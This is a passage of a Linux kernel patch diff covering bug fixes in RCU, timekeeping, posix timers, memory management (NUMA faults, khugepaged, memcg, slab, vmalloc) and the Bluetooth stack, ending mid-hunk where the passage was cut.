+@@ -47,7 +47,7 @@ static struct kmem_cache *create_pid_cachep(unsigned int level)
+ 		return kc;
+ 
+ 	snprintf(name, sizeof(name), "pid_%u", level + 1);
+-	len = sizeof(struct pid) + level * sizeof(struct upid);
++	len = struct_size((struct pid *)NULL, numbers, level + 1);
+ 	mutex_lock(&pid_caches_mutex);
+ 	/* Name collision forces to do allocation under mutex. */
+ 	if (!*pkc)
+diff --git a/kernel/rcu/rcu.h b/kernel/rcu/rcu.h
+index 48d8f754b730e..49ff955ed2034 100644
+--- a/kernel/rcu/rcu.h
++++ b/kernel/rcu/rcu.h
+@@ -10,6 +10,7 @@
+ #ifndef __LINUX_RCU_H
+ #define __LINUX_RCU_H
+ 
++#include <linux/slab.h>
+ #include <trace/events/rcu.h>
+ 
+ /*
+@@ -211,6 +212,12 @@ static inline void debug_rcu_head_unqueue(struct rcu_head *head)
+ }
+ #endif	/* #else !CONFIG_DEBUG_OBJECTS_RCU_HEAD */
+ 
++static inline void debug_rcu_head_callback(struct rcu_head *rhp)
++{
++	if (unlikely(!rhp->func))
++		kmem_dump_obj(rhp);
++}
++
+ extern int rcu_cpu_stall_suppress_at_boot;
+ 
+ static inline bool rcu_stall_is_suppressed_at_boot(void)
+diff --git a/kernel/rcu/srcutiny.c b/kernel/rcu/srcutiny.c
+index 33adafdad2613..5e7f336baa06a 100644
+--- a/kernel/rcu/srcutiny.c
++++ b/kernel/rcu/srcutiny.c
+@@ -138,6 +138,7 @@ void srcu_drive_gp(struct work_struct *wp)
+ 	while (lh) {
+ 		rhp = lh;
+ 		lh = lh->next;
++		debug_rcu_head_callback(rhp);
+ 		local_bh_disable();
+ 		rhp->func(rhp);
+ 		local_bh_enable();
+diff --git a/kernel/rcu/srcutree.c b/kernel/rcu/srcutree.c
+index 929dcbc04d29c..f7825900bdfd7 100644
+--- a/kernel/rcu/srcutree.c
++++ b/kernel/rcu/srcutree.c
+@@ -1591,6 +1591,7 @@ static void srcu_invoke_callbacks(struct work_struct *work)
+ 	rhp = rcu_cblist_dequeue(&ready_cbs);
+ 	for (; rhp != NULL; rhp = rcu_cblist_dequeue(&ready_cbs)) {
+ 		debug_rcu_head_unqueue(rhp);
++		debug_rcu_head_callback(rhp);
+ 		local_bh_disable();
+ 		rhp->func(rhp);
+ 		local_bh_enable();
+diff --git a/kernel/rcu/tasks.h b/kernel/rcu/tasks.h
+index 456c956f481ef..bb6b037ef30fa 100644
+--- a/kernel/rcu/tasks.h
++++ b/kernel/rcu/tasks.h
+@@ -487,6 +487,7 @@ static void rcu_tasks_invoke_cbs(struct rcu_tasks *rtp, struct rcu_tasks_percpu
+ 	raw_spin_unlock_irqrestore_rcu_node(rtpcp, flags);
+ 	len = rcl.len;
+ 	for (rhp = rcu_cblist_dequeue(&rcl); rhp; rhp = rcu_cblist_dequeue(&rcl)) {
++		debug_rcu_head_callback(rhp);
+ 		local_bh_disable();
+ 		rhp->func(rhp);
+ 		local_bh_enable();
+diff --git a/kernel/rcu/tiny.c b/kernel/rcu/tiny.c
+index a33a8d4942c37..21c040cba4bd0 100644
+--- a/kernel/rcu/tiny.c
++++ b/kernel/rcu/tiny.c
+@@ -97,6 +97,7 @@ static inline bool rcu_reclaim_tiny(struct rcu_head *head)
+ 
+ 	trace_rcu_invoke_callback("", head);
+ 	f = head->func;
++	debug_rcu_head_callback(head);
+ 	WRITE_ONCE(head->func, (rcu_callback_t)0L);
+ 	f(head);
+ 	rcu_lock_release(&rcu_callback_map);
+diff --git a/kernel/rcu/tree.c b/kernel/rcu/tree.c
+index cd6144cea5a1a..dd6e15ca63b0c 100644
+--- a/kernel/rcu/tree.c
++++ b/kernel/rcu/tree.c
+@@ -1336,7 +1336,7 @@ EXPORT_SYMBOL_GPL(rcu_gp_slow_register);
+ /* Unregister a counter, with NULL for not caring which. */
+ void rcu_gp_slow_unregister(atomic_t *rgssp)
+ {
+-	WARN_ON_ONCE(rgssp && rgssp != rcu_gp_slow_suppress);
++	WARN_ON_ONCE(rgssp && rgssp != rcu_gp_slow_suppress && rcu_gp_slow_suppress != NULL);
+ 
+ 	WRITE_ONCE(rcu_gp_slow_suppress, NULL);
+ }
+@@ -2292,6 +2292,7 @@ static void rcu_do_batch(struct rcu_data *rdp)
+ 		trace_rcu_invoke_callback(rcu_state.name, rhp);
+ 
+ 		f = rhp->func;
++		debug_rcu_head_callback(rhp);
+ 		WRITE_ONCE(rhp->func, (rcu_callback_t)0L);
+ 		f(rhp);
+ 
+diff --git a/kernel/time/clocksource.c b/kernel/time/clocksource.c
+index cd9a59011dee9..a3650699463bb 100644
+--- a/kernel/time/clocksource.c
++++ b/kernel/time/clocksource.c
+@@ -20,6 +20,16 @@
+ #include "tick-internal.h"
+ #include "timekeeping_internal.h"
+ 
++static noinline u64 cycles_to_nsec_safe(struct clocksource *cs, u64 start, u64 end)
++{
++	u64 delta = clocksource_delta(end, start, cs->mask);
++
++	if (likely(delta < cs->max_cycles))
++		return clocksource_cyc2ns(delta, cs->mult, cs->shift);
++
++	return mul_u64_u32_shr(delta, cs->mult, cs->shift);
++}
++
+ /**
+  * clocks_calc_mult_shift - calculate mult/shift factors for scaled math of clocks
+  * @mult:	pointer to mult variable
+@@ -219,8 +229,8 @@ enum wd_read_status {
+ static enum wd_read_status cs_watchdog_read(struct clocksource *cs, u64 *csnow, u64 *wdnow)
+ {
+ 	unsigned int nretries, max_retries;
+-	u64 wd_end, wd_end2, wd_delta;
+ 	int64_t wd_delay, wd_seq_delay;
++	u64 wd_end, wd_end2;
+ 
+ 	max_retries = clocksource_get_max_watchdog_retry();
+ 	for (nretries = 0; nretries <= max_retries; nretries++) {
+@@ -231,9 +241,7 @@ static enum wd_read_status cs_watchdog_read(struct clocksource *cs, u64 *csnow,
+ 		wd_end2 = watchdog->read(watchdog);
+ 		local_irq_enable();
+ 
+-		wd_delta = clocksource_delta(wd_end, *wdnow, watchdog->mask);
+-		wd_delay = clocksource_cyc2ns(wd_delta, watchdog->mult,
+-					      watchdog->shift);
++		wd_delay = cycles_to_nsec_safe(watchdog, *wdnow, wd_end);
+ 		if (wd_delay <= WATCHDOG_MAX_SKEW) {
+ 			if (nretries > 1 && nretries >= max_retries) {
+ 				pr_warn("timekeeping watchdog on CPU%d: %s retried %d times before success\n",
+@@ -251,8 +259,7 @@ static enum wd_read_status cs_watchdog_read(struct clocksource *cs, u64 *csnow,
+ 		 * report system busy, reinit the watchdog and skip the current
+ 		 * watchdog test.
+ 		 */
+-		wd_delta = clocksource_delta(wd_end2, wd_end, watchdog->mask);
+-		wd_seq_delay = clocksource_cyc2ns(wd_delta, watchdog->mult, watchdog->shift);
++		wd_seq_delay = cycles_to_nsec_safe(watchdog, wd_end, wd_end2);
+ 		if (wd_seq_delay > WATCHDOG_MAX_SKEW/2)
+ 			goto skip_test;
+ 	}
+@@ -363,8 +370,7 @@ void clocksource_verify_percpu(struct clocksource *cs)
+ 		delta = (csnow_end - csnow_mid) & cs->mask;
+ 		if (delta < 0)
+ 			cpumask_set_cpu(cpu, &cpus_ahead);
+-		delta = clocksource_delta(csnow_end, csnow_begin, cs->mask);
+-		cs_nsec = clocksource_cyc2ns(delta, cs->mult, cs->shift);
++		cs_nsec = cycles_to_nsec_safe(cs, csnow_begin, csnow_end);
+ 		if (cs_nsec > cs_nsec_max)
+ 			cs_nsec_max = cs_nsec;
+ 		if (cs_nsec < cs_nsec_min)
+@@ -395,8 +401,8 @@ static inline void clocksource_reset_watchdog(void)
+ 
+ static void clocksource_watchdog(struct timer_list *unused)
+ {
+-	u64 csnow, wdnow, cslast, wdlast, delta;
+ 	int64_t wd_nsec, cs_nsec, interval;
++	u64 csnow, wdnow, cslast, wdlast;
+ 	int next_cpu, reset_pending;
+ 	struct clocksource *cs;
+ 	enum wd_read_status read_ret;
+@@ -453,12 +459,8 @@ static void clocksource_watchdog(struct timer_list *unused)
+ 			continue;
+ 		}
+ 
+-		delta = clocksource_delta(wdnow, cs->wd_last, watchdog->mask);
+-		wd_nsec = clocksource_cyc2ns(delta, watchdog->mult,
+-					     watchdog->shift);
+-
+-		delta = clocksource_delta(csnow, cs->cs_last, cs->mask);
+-		cs_nsec = clocksource_cyc2ns(delta, cs->mult, cs->shift);
++		wd_nsec = cycles_to_nsec_safe(watchdog, cs->wd_last, wdnow);
++		cs_nsec = cycles_to_nsec_safe(cs, cs->cs_last, csnow);
+ 		wdlast = cs->wd_last; /* save these in case we print them */
+ 		cslast = cs->cs_last;
+ 		cs->cs_last = csnow;
+@@ -821,7 +823,7 @@ void clocksource_start_suspend_timing(struct clocksource *cs, u64 start_cycles)
+  */
+ u64 clocksource_stop_suspend_timing(struct clocksource *cs, u64 cycle_now)
+ {
+-	u64 now, delta, nsec = 0;
++	u64 now, nsec = 0;
+ 
+ 	if (!suspend_clocksource)
+ 		return 0;
+@@ -836,12 +838,8 @@ u64 clocksource_stop_suspend_timing(struct clocksource *cs, u64 cycle_now)
+ 	else
+ 		now = suspend_clocksource->read(suspend_clocksource);
+ 
+-	if (now > suspend_start) {
+-		delta = clocksource_delta(now, suspend_start,
+-					  suspend_clocksource->mask);
+-		nsec = mul_u64_u32_shr(delta, suspend_clocksource->mult,
+-				       suspend_clocksource->shift);
+-	}
++	if (now > suspend_start)
++		nsec = cycles_to_nsec_safe(suspend_clocksource, suspend_start, now);
+ 
+ 	/*
+ 	 * Disable the suspend timer to save power if current clocksource is
+diff --git a/kernel/time/hrtimer.c b/kernel/time/hrtimer.c
+index 9bb88836c42e6..f62cc13b5f143 100644
+--- a/kernel/time/hrtimer.c
++++ b/kernel/time/hrtimer.c
+@@ -38,6 +38,7 @@
+ #include <linux/sched/deadline.h>
+ #include <linux/sched/nohz.h>
+ #include <linux/sched/debug.h>
++#include <linux/sched/isolation.h>
+ #include <linux/timer.h>
+ #include <linux/freezer.h>
+ #include <linux/compat.h>
+@@ -1284,6 +1285,8 @@ void hrtimer_start_range_ns(struct hrtimer *timer, ktime_t tim,
+ 	struct hrtimer_clock_base *base;
+ 	unsigned long flags;
+ 
++	if (WARN_ON_ONCE(!timer->function))
++		return;
+ 	/*
+ 	 * Check whether the HRTIMER_MODE_SOFT bit and hrtimer.is_soft
+ 	 * match on CONFIG_PREEMPT_RT = n. With PREEMPT_RT check the hard
+@@ -2220,8 +2223,8 @@ static void migrate_hrtimer_list(struct hrtimer_clock_base *old_base,
+ 
+ int hrtimers_cpu_dying(unsigned int dying_cpu)
+ {
++	int i, ncpu = cpumask_any_and(cpu_active_mask, housekeeping_cpumask(HK_TYPE_TIMER));
+ 	struct hrtimer_cpu_base *old_base, *new_base;
+-	int i, ncpu = cpumask_first(cpu_active_mask);
+ 
+ 	tick_cancel_sched_timer(dying_cpu);
+ 
+diff --git a/kernel/time/posix-timers.c b/kernel/time/posix-timers.c
+index ed3c4a9543982..2d6cf93ca370a 100644
+--- a/kernel/time/posix-timers.c
++++ b/kernel/time/posix-timers.c
+@@ -140,25 +140,30 @@ static struct k_itimer *posix_timer_by_id(timer_t id)
+ static int posix_timer_add(struct k_itimer *timer)
+ {
+ 	struct signal_struct *sig = current->signal;
+-	int first_free_id = sig->posix_timer_id;
+ 	struct hlist_head *head;
+-	int ret = -ENOENT;
++	unsigned int cnt, id;
+ 
+-	do {
++	/*
++	 * FIXME: Replace this by a per signal struct xarray once there is
++	 * a plan to handle the resulting CRIU regression gracefully.
++	 */
++	for (cnt = 0; cnt <= INT_MAX; cnt++) {
+ 		spin_lock(&hash_lock);
+-		head = &posix_timers_hashtable[hash(sig, sig->posix_timer_id)];
+-		if (!__posix_timers_find(head, sig, sig->posix_timer_id)) {
++		id = sig->next_posix_timer_id;
++
++		/* Write the next ID back. Clamp it to the positive space */
++		sig->next_posix_timer_id = (id + 1) & INT_MAX;
++
++		head = &posix_timers_hashtable[hash(sig, id)];
++		if (!__posix_timers_find(head, sig, id)) {
+ 			hlist_add_head_rcu(&timer->t_hash, head);
+-			ret = sig->posix_timer_id;
++			spin_unlock(&hash_lock);
++			return id;
+ 		}
+-		if (++sig->posix_timer_id < 0)
+-			sig->posix_timer_id = 0;
+-		if ((sig->posix_timer_id == first_free_id) && (ret == -ENOENT))
+-			/* Loop over all possible ids completed */
+-			ret = -EAGAIN;
+ 		spin_unlock(&hash_lock);
+-	} while (ret == -ENOENT);
+-	return ret;
++	}
++	/* POSIX return code when no timer ID could be allocated */
++	return -EAGAIN;
+ }
+ 
+ static inline void unlock_timer(struct k_itimer *timr, unsigned long flags)
+diff --git a/lib/math/prime_numbers.c b/lib/math/prime_numbers.c
+index d42cebf7407fc..d3b64b10da1c5 100644
+--- a/lib/math/prime_numbers.c
++++ b/lib/math/prime_numbers.c
+@@ -6,8 +6,6 @@
+ #include <linux/prime_numbers.h>
+ #include <linux/slab.h>
+ 
+-#define bitmap_size(nbits) (BITS_TO_LONGS(nbits) * sizeof(unsigned long))
+-
+ struct primes {
+ 	struct rcu_head rcu;
+ 	unsigned long last, sz;
+diff --git a/mm/huge_memory.c b/mm/huge_memory.c
+index f97b221fb6567..98a1a05f2db2d 100644
+--- a/mm/huge_memory.c
++++ b/mm/huge_memory.c
+@@ -1492,7 +1492,7 @@ vm_fault_t do_huge_pmd_numa_page(struct vm_fault *vmf)
+ 	vmf->ptl = pmd_lock(vma->vm_mm, vmf->pmd);
+ 	if (unlikely(!pmd_same(oldpmd, *vmf->pmd))) {
+ 		spin_unlock(vmf->ptl);
+-		goto out;
++		return 0;
+ 	}
+ 
+ 	pmd = pmd_modify(oldpmd, vma->vm_page_prot);
+@@ -1525,23 +1525,16 @@ vm_fault_t do_huge_pmd_numa_page(struct vm_fault *vmf)
+ 	if (migrated) {
+ 		flags |= TNF_MIGRATED;
+ 		page_nid = target_nid;
+-	} else {
+-		flags |= TNF_MIGRATE_FAIL;
+-		vmf->ptl = pmd_lock(vma->vm_mm, vmf->pmd);
+-		if (unlikely(!pmd_same(oldpmd, *vmf->pmd))) {
+-			spin_unlock(vmf->ptl);
+-			goto out;
+-		}
+-		goto out_map;
++		task_numa_fault(last_cpupid, page_nid, HPAGE_PMD_NR, flags);
++		return 0;
+ 	}
+ 
+-out:
+-	if (page_nid != NUMA_NO_NODE)
+-		task_numa_fault(last_cpupid, page_nid, HPAGE_PMD_NR,
+-				flags);
+-
+-	return 0;
+-
++	flags |= TNF_MIGRATE_FAIL;
++	vmf->ptl = pmd_lock(vma->vm_mm, vmf->pmd);
++	if (unlikely(!pmd_same(oldpmd, *vmf->pmd))) {
++		spin_unlock(vmf->ptl);
++		return 0;
++	}
+ out_map:
+ 	/* Restore the PMD */
+ 	pmd = pmd_modify(oldpmd, vma->vm_page_prot);
+@@ -1551,7 +1544,10 @@ vm_fault_t do_huge_pmd_numa_page(struct vm_fault *vmf)
+ 	set_pmd_at(vma->vm_mm, haddr, vmf->pmd, pmd);
+ 	update_mmu_cache_pmd(vma, vmf->address, vmf->pmd);
+ 	spin_unlock(vmf->ptl);
+-	goto out;
++
++	if (page_nid != NUMA_NO_NODE)
++		task_numa_fault(last_cpupid, page_nid, HPAGE_PMD_NR, flags);
++	return 0;
+ }
+ 
+ /*
+diff --git a/mm/khugepaged.c b/mm/khugepaged.c
+index 65bd0b105266a..085fca1fa27af 100644
+--- a/mm/khugepaged.c
++++ b/mm/khugepaged.c
+@@ -55,6 +55,7 @@ enum scan_result {
+ 	SCAN_CGROUP_CHARGE_FAIL,
+ 	SCAN_TRUNCATED,
+ 	SCAN_PAGE_HAS_PRIVATE,
++	SCAN_STORE_FAILED,
+ };
+ 
+ #define CREATE_TRACE_POINTS
+@@ -1840,6 +1841,15 @@ static int collapse_file(struct mm_struct *mm, unsigned long addr,
+ 					goto xa_locked;
+ 				}
+ 				xas_store(&xas, hpage);
++				if (xas_error(&xas)) {
++					/* revert shmem_charge performed
++					 * in the previous condition
++					 */
++					mapping->nrpages--;
++					shmem_uncharge(mapping->host, 1);
++					result = SCAN_STORE_FAILED;
++					goto xa_locked;
++				}
+ 				nr_none++;
+ 				continue;
+ 			}
+@@ -1991,6 +2001,11 @@ static int collapse_file(struct mm_struct *mm, unsigned long addr,
+ 
+ 		/* Finally, replace with the new page. */
+ 		xas_store(&xas, hpage);
++		/* We can't get an ENOMEM here (because the allocation happened before)
++		 * but let's check for errors (XArray implementation can be
++		 * changed in the future)
++		 */
++		WARN_ON_ONCE(xas_error(&xas));
+ 		continue;
+ out_unlock:
+ 		unlock_page(page);
+@@ -2028,6 +2043,11 @@ static int collapse_file(struct mm_struct *mm, unsigned long addr,
+ 	/* Join all the small entries into a single multi-index entry */
+ 	xas_set_order(&xas, start, HPAGE_PMD_ORDER);
+ 	xas_store(&xas, hpage);
++	/* Here we can't get an ENOMEM (because entries were
++	 * previously allocated) But let's check for errors
++	 * (XArray implementation can be changed in the future)
++	 */
++	WARN_ON_ONCE(xas_error(&xas));
+ xa_locked:
+ 	xas_unlock_irq(&xas);
+ xa_unlocked:
+diff --git a/mm/memcontrol.c b/mm/memcontrol.c
+index 4570d3e315cf1..4ad6e8345b364 100644
+--- a/mm/memcontrol.c
++++ b/mm/memcontrol.c
+@@ -4857,9 +4857,12 @@ static ssize_t memcg_write_event_control(struct kernfs_open_file *of,
+ 	buf = endp + 1;
+ 
+ 	cfd = simple_strtoul(buf, &endp, 10);
+-	if ((*endp != ' ') && (*endp != '\0'))
++	if (*endp == '\0')
++		buf = endp;
++	else if (*endp == ' ')
++		buf = endp + 1;
++	else
+ 		return -EINVAL;
+-	buf = endp + 1;
+ 
+ 	event = kzalloc(sizeof(*event), GFP_KERNEL);
+ 	if (!event)
+diff --git a/mm/memory-failure.c b/mm/memory-failure.c
+index 8067c1e22af9b..56b2dcc2c0d63 100644
+--- a/mm/memory-failure.c
++++ b/mm/memory-failure.c
+@@ -2208,7 +2208,7 @@ struct memory_failure_entry {
+ struct memory_failure_cpu {
+ 	DECLARE_KFIFO(fifo, struct memory_failure_entry,
+ 		      MEMORY_FAILURE_FIFO_SIZE);
+-	spinlock_t lock;
++	raw_spinlock_t lock;
+ 	struct work_struct work;
+ };
+ 
+@@ -2234,20 +2234,22 @@ void memory_failure_queue(unsigned long pfn, int flags)
+ {
+ 	struct memory_failure_cpu *mf_cpu;
+ 	unsigned long proc_flags;
++	bool buffer_overflow;
+ 	struct memory_failure_entry entry = {
+ 		.pfn =		pfn,
+ 		.flags =	flags,
+ 	};
+ 
+ 	mf_cpu = &get_cpu_var(memory_failure_cpu);
+-	spin_lock_irqsave(&mf_cpu->lock, proc_flags);
+-	if (kfifo_put(&mf_cpu->fifo, entry))
++	raw_spin_lock_irqsave(&mf_cpu->lock, proc_flags);
++	buffer_overflow = !kfifo_put(&mf_cpu->fifo, entry);
++	if (!buffer_overflow)
+ 		schedule_work_on(smp_processor_id(), &mf_cpu->work);
+-	else
++	raw_spin_unlock_irqrestore(&mf_cpu->lock, proc_flags);
++	put_cpu_var(memory_failure_cpu);
++	if (buffer_overflow)
+ 		pr_err("buffer overflow when queuing memory failure at %#lx\n",
+ 		       pfn);
+-	spin_unlock_irqrestore(&mf_cpu->lock, proc_flags);
+-	put_cpu_var(memory_failure_cpu);
+ }
+ EXPORT_SYMBOL_GPL(memory_failure_queue);
+ 
+@@ -2260,9 +2262,9 @@ static void memory_failure_work_func(struct work_struct *work)
+ 
+ 	mf_cpu = container_of(work, struct memory_failure_cpu, work);
+ 	for (;;) {
+-		spin_lock_irqsave(&mf_cpu->lock, proc_flags);
++		raw_spin_lock_irqsave(&mf_cpu->lock, proc_flags);
+ 		gotten = kfifo_get(&mf_cpu->fifo, &entry);
+-		spin_unlock_irqrestore(&mf_cpu->lock, proc_flags);
++		raw_spin_unlock_irqrestore(&mf_cpu->lock, proc_flags);
+ 		if (!gotten)
+ 			break;
+ 		if (entry.flags & MF_SOFT_OFFLINE)
+@@ -2292,7 +2294,7 @@ static int __init memory_failure_init(void)
+ 
+ 	for_each_possible_cpu(cpu) {
+ 		mf_cpu = &per_cpu(memory_failure_cpu, cpu);
+-		spin_lock_init(&mf_cpu->lock);
++		raw_spin_lock_init(&mf_cpu->lock);
+ 		INIT_KFIFO(mf_cpu->fifo);
+ 		INIT_WORK(&mf_cpu->work, memory_failure_work_func);
+ 	}
+diff --git a/mm/memory.c b/mm/memory.c
+index 301c74c444385..73085e36aabac 100644
+--- a/mm/memory.c
++++ b/mm/memory.c
+@@ -4786,7 +4786,7 @@ static vm_fault_t do_numa_page(struct vm_fault *vmf)
+ 	spin_lock(vmf->ptl);
+ 	if (unlikely(!pte_same(*vmf->pte, vmf->orig_pte))) {
+ 		pte_unmap_unlock(vmf->pte, vmf->ptl);
+-		goto out;
++		return 0;
+ 	}
+ 
+ 	/* Get the normal PTE  */
+@@ -4841,21 +4841,17 @@ static vm_fault_t do_numa_page(struct vm_fault *vmf)
+ 	if (migrate_misplaced_page(page, vma, target_nid)) {
+ 		page_nid = target_nid;
+ 		flags |= TNF_MIGRATED;
+-	} else {
+-		flags |= TNF_MIGRATE_FAIL;
+-		vmf->pte = pte_offset_map(vmf->pmd, vmf->address);
+-		spin_lock(vmf->ptl);
+-		if (unlikely(!pte_same(*vmf->pte, vmf->orig_pte))) {
+-			pte_unmap_unlock(vmf->pte, vmf->ptl);
+-			goto out;
+-		}
+-		goto out_map;
++		task_numa_fault(last_cpupid, page_nid, 1, flags);
++		return 0;
+ 	}
+ 
+-out:
+-	if (page_nid != NUMA_NO_NODE)
+-		task_numa_fault(last_cpupid, page_nid, 1, flags);
+-	return 0;
++	flags |= TNF_MIGRATE_FAIL;
++	vmf->pte = pte_offset_map(vmf->pmd, vmf->address);
++	spin_lock(vmf->ptl);
++	if (unlikely(!pte_same(*vmf->pte, vmf->orig_pte))) {
++		pte_unmap_unlock(vmf->pte, vmf->ptl);
++		return 0;
++	}
+ out_map:
+ 	/*
+ 	 * Make it present again, depending on how arch implements
+@@ -4869,7 +4865,10 @@ static vm_fault_t do_numa_page(struct vm_fault *vmf)
+ 	ptep_modify_prot_commit(vma, vmf->address, vmf->pte, old_pte, pte);
+ 	update_mmu_cache(vma, vmf->address, vmf->pte);
+ 	pte_unmap_unlock(vmf->pte, vmf->ptl);
+-	goto out;
++
++	if (page_nid != NUMA_NO_NODE)
++		task_numa_fault(last_cpupid, page_nid, 1, flags);
++	return 0;
+ }
+ 
+ static inline vm_fault_t create_huge_pmd(struct vm_fault *vmf)
+diff --git a/mm/slab_common.c b/mm/slab_common.c
+index 4736c0e6093fa..2a66be8ffa6be 100644
+--- a/mm/slab_common.c
++++ b/mm/slab_common.c
+@@ -523,26 +523,6 @@ bool slab_is_available(void)
+ }
+ 
+ #ifdef CONFIG_PRINTK
+-/**
+- * kmem_valid_obj - does the pointer reference a valid slab object?
+- * @object: pointer to query.
+- *
+- * Return: %true if the pointer is to a not-yet-freed object from
+- * kmalloc() or kmem_cache_alloc(), either %true or %false if the pointer
+- * is to an already-freed object, and %false otherwise.
+- */
+-bool kmem_valid_obj(void *object)
+-{
+-	struct folio *folio;
+-
+-	/* Some arches consider ZERO_SIZE_PTR to be a valid address. */
+-	if (object < (void *)PAGE_SIZE || !virt_addr_valid(object))
+-		return false;
+-	folio = virt_to_folio(object);
+-	return folio_test_slab(folio);
+-}
+-EXPORT_SYMBOL_GPL(kmem_valid_obj);
+-
+ static void kmem_obj_info(struct kmem_obj_info *kpp, void *object, struct slab *slab)
+ {
+ 	if (__kfence_obj_info(kpp, object, slab))
+@@ -561,11 +541,11 @@ static void kmem_obj_info(struct kmem_obj_info *kpp, void *object, struct slab *
+  * and, if available, the slab name, return address, and stack trace from
+  * the allocation and last free path of that object.
+  *
+- * This function will splat if passed a pointer to a non-slab object.
+- * If you are not sure what type of object you have, you should instead
+- * use mem_dump_obj().
++ * Return: %true if the pointer is to a not-yet-freed object from
++ * kmalloc() or kmem_cache_alloc(), either %true or %false if the pointer
++ * is to an already-freed object, and %false otherwise.
+  */
+-void kmem_dump_obj(void *object)
++bool kmem_dump_obj(void *object)
+ {
+ 	char *cp = IS_ENABLED(CONFIG_MMU) ? "" : "/vmalloc";
+ 	int i;
+@@ -573,13 +553,13 @@ void kmem_dump_obj(void *object)
+ 	unsigned long ptroffset;
+ 	struct kmem_obj_info kp = { };
+ 
+-	if (WARN_ON_ONCE(!virt_addr_valid(object)))
+-		return;
++	/* Some arches consider ZERO_SIZE_PTR to be a valid address. */
++	if (object < (void *)PAGE_SIZE || !virt_addr_valid(object))
++		return false;
+ 	slab = virt_to_slab(object);
+-	if (WARN_ON_ONCE(!slab)) {
+-		pr_cont(" non-slab memory.\n");
+-		return;
+-	}
++	if (!slab)
++		return false;
++
+ 	kmem_obj_info(&kp, object, slab);
+ 	if (kp.kp_slab_cache)
+ 		pr_cont(" slab%s %s", cp, kp.kp_slab_cache->name);
+@@ -616,6 +596,7 @@ void kmem_dump_obj(void *object)
+ 		pr_info("    %pS\n", kp.kp_free_stack[i]);
+ 	}
+ 
++	return true;
+ }
+ EXPORT_SYMBOL_GPL(kmem_dump_obj);
+ #endif
+diff --git a/mm/util.c b/mm/util.c
+index ce3bb17c97b9d..aa4f8a45dd569 100644
+--- a/mm/util.c
++++ b/mm/util.c
+@@ -1119,10 +1119,8 @@ void mem_dump_obj(void *object)
+ {
+ 	const char *type;
+ 
+-	if (kmem_valid_obj(object)) {
+-		kmem_dump_obj(object);
++	if (kmem_dump_obj(object))
+ 		return;
+-	}
+ 
+ 	if (vmalloc_dump_obj(object))
+ 		return;
+diff --git a/mm/vmalloc.c b/mm/vmalloc.c
+index c5e30b52844c8..a0b650f50faa3 100644
+--- a/mm/vmalloc.c
++++ b/mm/vmalloc.c
+@@ -2992,15 +2992,8 @@ vm_area_alloc_pages(gfp_t gfp, int nid,
+ 			page = alloc_pages(alloc_gfp, order);
+ 		else
+ 			page = alloc_pages_node(nid, alloc_gfp, order);
+-		if (unlikely(!page)) {
+-			if (!nofail)
+-				break;
+-
+-			/* fall back to the zero order allocations */
+-			alloc_gfp |= __GFP_NOFAIL;
+-			order = 0;
+-			continue;
+-		}
++		if (unlikely(!page))
++			break;
+ 
+ 		/*
+ 		 * Higher order allocations must be able to be treated as
+diff --git a/net/bluetooth/bnep/core.c b/net/bluetooth/bnep/core.c
+index 5a6a49885ab66..a660c428e2207 100644
+--- a/net/bluetooth/bnep/core.c
++++ b/net/bluetooth/bnep/core.c
+@@ -385,7 +385,8 @@ static int bnep_rx_frame(struct bnep_session *s, struct sk_buff *skb)
+ 
+ 	case BNEP_COMPRESSED_DST_ONLY:
+ 		__skb_put_data(nskb, skb_mac_header(skb), ETH_ALEN);
+-		__skb_put_data(nskb, s->eh.h_source, ETH_ALEN + 2);
++		__skb_put_data(nskb, s->eh.h_source, ETH_ALEN);
++		put_unaligned(s->eh.h_proto, (__be16 *)__skb_put(nskb, 2));
+ 		break;
+ 
+ 	case BNEP_GENERAL:
+diff --git a/net/bluetooth/hci_conn.c b/net/bluetooth/hci_conn.c
+index bac5a369d2bef..858c454e35e67 100644
+--- a/net/bluetooth/hci_conn.c
++++ b/net/bluetooth/hci_conn.c
+@@ -293,6 +293,13 @@ static int configure_datapath_sync(struct hci_dev *hdev, struct bt_codec *codec)
+ 	__u8 vnd_len, *vnd_data = NULL;
+ 	struct hci_op_configure_data_path *cmd = NULL;
+ 
++	if (!codec->data_path || !hdev->get_codec_config_data)
++		return 0;
++
++	/* Do not take me as error */
++	if (!hdev->get_codec_config_data)
++		return 0;
++
+ 	err = hdev->get_codec_config_data(hdev, ESCO_LINK, codec, &vnd_len,
+ 					  &vnd_data);
+ 	if (err < 0)
+@@ -338,9 +345,7 @@ static int hci_enhanced_setup_sync(struct hci_dev *hdev, void *data)
+ 
+ 	bt_dev_dbg(hdev, "hcon %p", conn);
+ 
+-	/* for offload use case, codec needs to configured before opening SCO */
+-	if (conn->codec.data_path)
+-		configure_datapath_sync(hdev, &conn->codec);
++	configure_datapath_sync(hdev, &conn->codec);
+ 
+ 	conn->state = BT_CONNECT;
+ 	conn->out = true;
+diff --git a/net/bluetooth/hci_core.c b/net/bluetooth/hci_core.c
+index 398a324657697..210e03a3609d4 100644
+--- a/net/bluetooth/hci_core.c
++++ b/net/bluetooth/hci_core.c
+@@ -3419,7 +3419,12 @@ static void hci_link_tx_to(struct hci_dev *hdev, __u8 type)
+ 		if (c->type == type && c->sent) {
+ 			bt_dev_err(hdev, "killing stalled connection %pMR",
+ 				   &c->dst);
++			/* hci_disconnect might sleep, so, we have to release
++			 * the RCU read lock before calling it.
++			 */
++			rcu_read_unlock();
+ 			hci_disconnect(c, HCI_ERROR_REMOTE_USER_TERM);
++			rcu_read_lock();
+ 		}
+ 	}
+ 
+@@ -3739,19 +3744,19 @@ static void hci_sched_le(struct hci_dev *hdev)
+ {
+ 	struct hci_chan *chan;
+ 	struct sk_buff *skb;
+-	int quote, cnt, tmp;
++	int quote, *cnt, tmp;
+ 
+ 	BT_DBG("%s", hdev->name);
+ 
+ 	if (!hci_conn_num(hdev, LE_LINK))
+ 		return;
+ 
+-	cnt = hdev->le_pkts ? hdev->le_cnt : hdev->acl_cnt;
++	cnt = hdev->le_pkts ? &hdev->le_cnt : &hdev->acl_cnt;
+ 
+-	__check_timeout(hdev, cnt, LE_LINK);
++	__check_timeout(hdev, *cnt, LE_LINK);
+ 
+-	tmp = cnt;
+-	while (cnt && (chan = hci_chan_sent(hdev, LE_LINK, &quote))) {
++	tmp = *cnt;
++	while (*cnt && (chan = hci_chan_sent(hdev, LE_LINK, &quote))) {
+ 		u32 priority = (skb_peek(&chan->data_q))->priority;
+ 		while (quote-- && (skb = skb_peek(&chan->data_q))) {
+ 			BT_DBG("chan %p skb %p len %d priority %u", chan, skb,
+@@ -3766,7 +3771,7 @@ static void hci_sched_le(struct hci_dev *hdev)
